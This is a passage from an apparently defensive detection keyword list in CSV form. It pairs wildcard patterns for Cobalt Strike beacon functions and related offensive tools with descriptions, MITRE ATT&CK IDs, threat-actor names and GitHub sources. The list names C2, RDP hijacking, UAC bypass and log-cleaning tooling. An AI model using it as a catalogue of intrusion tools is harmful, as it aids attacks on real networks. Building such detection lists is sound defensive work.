Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_endpoint*c2Get*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,0,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*beacon_endpoint*c2Post*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,0,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*beacon_execute_job*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_exploit_describe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_exploit_register*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z 
-*beacon_funcs.c*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_funcs.h*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_funcs.x64.*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_funcs.x86.*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_generate.py*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*beacon_generate.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*Beacon_GETPOST*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_host_script*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 
- T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*beacon_host_script*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_inline_execute*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*beacon_log_clean*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*beacon_output_ps.cna*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*beacon_print*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*BEACON_RDLL_*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exec_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
